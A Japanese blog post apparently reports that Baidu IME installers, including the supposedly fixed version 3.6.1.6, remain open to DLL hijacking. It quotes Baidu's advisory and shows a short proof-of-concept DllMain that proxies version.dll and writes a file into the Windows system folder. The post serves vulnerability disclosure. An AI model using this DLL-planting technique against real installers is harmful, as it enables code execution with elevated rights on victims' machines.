Baidu IMEのインストーラーに脆弱性、今度こそ直したよ!→調べたら何も直っていなかった件

Baidu IMEのインストーラーが意図しない DLL を読み込んでしまう脆弱性について|Baidu Japan

Baidu IMEのインストーラーが意図しない DLL を読み込んでしまう脆弱性について

■概要

Baidu IME(バージョン3.3.2.16)のインストーラーを実行すると、意図しないDLLを読み込んでしまう脆弱性の存在が判明いたしました。

当該インストーラーと同じフォルダに存在する第三者の意図しないコードを実行される可能性があります。

(*)一例として、当該インストーラーを特定のファイル名のトロイの木馬等と同じフォルダで実行すると、悪意のあるコードが実行される危険性があります。

なお、当該製品の提供は既に停止しております。

■対処

最新バージョン(Ver3.6.1.6)をお使いください。

Baidu IME

■該当製品の確認方法

影響を受ける製品は以下の製品です。

  • 製品名称:Baidu IME
  • バージョン:3.3.2.16
  • 実行ファイルの体裁:BaiduType_Setup_Light.exe
  • 対象プラットフォーム:64bit版を含むWindows XP/Vista/7/8/8.1/10

■謝辞

なお、本脆弱性の報告は橘総合研究所の英利雅美様よりご報告いただきました。謹んでお礼を申し上げます。

■関連情報

■連絡先

info_jp@baidu.com


■更新履歴

  • 2017年06月12日 19:20 発表

|。・ω・) 3.6.1.6 も直ってないんですが、結局そのままリリースした模様。

#define DLL_PROCESS_DETACH 0 /* detach process (unload library) */
#define DLL_PROCESS_ATTACH 1
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    char sys[512];
   switch ( ul_reason_for_call )
   {
      case DLL_PROCESS_ATTACH:
        ExpandEnvironmentStrings("%systemroot%\\system32\\version.dll",sys,512);
        hDll = LoadLibraryA(sys);
        ExpandEnvironmentStrings("%systemroot%\\mof・ω・.txt",sys,512);
        fs= fopen(sys,"wb+");
        fclose(fs);

      // A process is loading the DLL.
      break;

攻撃コード書き換えて、システムフォルダにファイルを作るようにしてみた

moff
だめですねw

mof2
ちなみにダウンロード版インストーラーは降ってくるのも少し古い 3.6.1.2ですね

おすすめ

2件のフィードバック

  1. ななし より:

    技術が云々と言うより、連絡体制、チェック体制が悪く、直ってるかどうか確認してないだけでは。
    何だか下請け任せで、管理技術者がいないように思うのです。

  2. ななし より:

    技術が云々と言うより、連絡体制、チェック体制が悪く、直ってるかどうか確認してないだけでは。
    何だか下請け任せで、管理技術者がいないように思うのです。

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です